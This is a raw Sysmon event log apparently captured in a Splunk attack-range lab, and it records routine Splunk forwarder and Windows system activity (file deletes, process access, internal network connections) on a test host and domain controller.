Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000222273Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:49.118{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACEAB2F47DF84780977D8488638AC736,SHA256=52BC18217846FD4B5858B589A30CDA8A238B5395CA6406A672C2DD0541822663,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298403Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:50.412{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68E1490DB984D905C2A1C5E901593C39,SHA256=69B7AE3170F69DCEB9572739C27EBE09D37196A52E90D667DE6175E1273888FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222290Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:50.133{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2261A7EA8E1F028951FC0F6C56F7181,SHA256=0C9573793B55C0C8F68DEF3F9730F96A34CB258D601CAD8E996085698D8367D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222289Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:50.008{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=60052D1E75900AFCA649EBE0ADC47731,SHA256=7C915A04EADFB26ED3368E9CC11748A596315ADD955A5604FAF05A18019B8C81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298404Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:51.434{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C2BCA5AA0B008E899DED4449CB82B63,SHA256=6B3608FBA0C1459C09D66303EAB63FE4F326752B8FF823F41C75E4AB4603EABE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222304Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:51.258{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-18CF-6216-3805-000000003902}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222303Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:51.258{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222302Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:51.258{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222301Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:51.258{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222300Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:51.258{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222299Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:51.258{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222298Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:51.258{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222297Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:51.258{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222296Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:51.258{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222295Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:51.258{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222294Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:51.258{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-18CF-6216-3805-000000003902}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000222293Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:51.258{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=370063414ADE1915BF9AB27F8C6AD0C4,SHA256=24C98AC68B1E375792BC688329DD2D3801E5DFFB942B82192F429F4A69286525,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222292Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:51.258{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-18CF-6216-3805-000000003902}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222291Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:51.259{4F8D34B0-18CF-6216-3805-000000003902}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298405Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:52.452{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDC64D30CD726BDAEA37FE828A0C09A6,SHA256=6F27A52A7B9A90DDED472D9E21F18F8E8EE7743526BEAE98B5CC4437135F4425,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222307Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:49.542{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51706-false10.0.1.12-8000- 23542300x8000000000000000222306Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:52.289{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB2477CEB02560ABE0DB2A1C770D48DB,SHA256=D0519A584E71D1C2F27D02AD9789682DD3B7974A4C6E36C84A4B9A485222BBBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222305Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:52.274{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0D97A4D736B53ADA107FE8ADADE98D2D,SHA256=907EAD4C7CDC0469C1F1080699CE76863277058A557F0E484F1FC2A521166477,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222308Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:53.414{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5F9F4A5F45D0D9A3A85BB3452BB20FF,SHA256=B72C8407A758F9BBC85EAD872C4595B1DA6DB046859365ABDD8EED2BD416296E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298407Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:51.479{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49529-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298406Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:53.467{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70859CBDA1AC5ADCE5792DFE5CBDD779,SHA256=0BD736A13261598C22E51FB7B1364A4746FB4759819EC12E3F331825C9EADAE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298408Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:54.482{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60CB0D0588B6729F08331F7CBD790DB8,SHA256=5FD3C12EC9631D6CEDBD538F1C449DEF78526A1E629B2A677ADF82C3B1AB7D34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222309Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:54.461{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD9BB06779A14A6DA985052C91299899,SHA256=9233278D3B02ED531A0FED3BCCD6C2932C815398AB12C49932F604FF145C4F99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298409Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:55.512{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A82F08FD2AE979966EB0B820B1A0A35,SHA256=371DB0D53D58FFFB50DF4B8A7F51A07E05464E8AB31B5FE1365BD6462FE1EF71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222310Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:55.461{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=102BE4B51E279532BBC9579F6DA1873E,SHA256=C697E1005B595B93DDC68F580DDA3B618EB156007F31688526E4498065A6CF27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298410Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:56.513{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB762234CB4E2A87C6590703DB6F589A,SHA256=AFB327B937167A32AB8CFC4C1D706FBA90D1831530857DAEB3620888CE2296FC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222312Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:54.666{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51707-false10.0.1.12-8000- 23542300x8000000000000000222311Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:56.477{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80A6CF7E63FA5B7BD9850AAC0F707AFC,SHA256=DAF2EF08514517F4E7C991DB1AE3A2B823C39495D35D95388879A7A8FAE4C908,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222313Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:57.492{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEEAD8E25F06DA7741CC51D83D8C6E04,SHA256=F7CD6B3110DD91274CF8EA411A095972F872D28CEEF9BF43ADA67F39CE0FB5E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298411Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:57.550{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E347674E70D1D12E13B09FCAEFB5F38E,SHA256=8308F9E89BF27D3F8E997EA2DDFFC25935B837008690A661B5723215ADFA00C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222314Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:58.492{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=056D80A9B35F37C600E451BD254D9E59,SHA256=9593234B800932EAE5EEAA7F63659FB6C7FBA1E7322941070CA2796ABB738AA9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298413Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:56.593{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49530-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298412Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:58.565{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86E8FD0B5FCCD1B99ED28D107B70D8D9,SHA256=0E552E777DDEF3027864FECF354FEE45AC18875B130D6A52D469D3000D2B123D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222315Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 